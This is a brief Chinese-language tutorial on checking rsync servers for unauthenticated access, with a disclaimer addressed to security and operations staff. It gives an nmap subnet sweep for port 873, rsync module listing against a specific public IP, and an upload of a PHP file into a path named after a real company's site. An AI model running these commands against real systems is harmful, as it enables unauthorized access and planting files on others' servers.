Rsync漏洞检测实践

注意：本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。

[TOC]

Rsync 未授权访问漏洞

描述: 安全之默认密码登陆之Rsync未授权访问。

1.rsync默认的端口是873，可以使用nmap扫描IP是否开放该端口,当找到开放端口后，查看时候可默认口令登陆，使用命令查看：

# 扫描
nmap -n --open -p 873 x.x.x.x/24

# 验证
rsync ip::

# 显示二级文件
rsync -av 115.29.246.254::

2.既然是同步文件，自然有选择查看、上传或者下载的能力需视权限设定

# 同步数据到本地
rsync -vzrtopg --progress ./sxx.php 172.17.16.24::www/support.meitu.com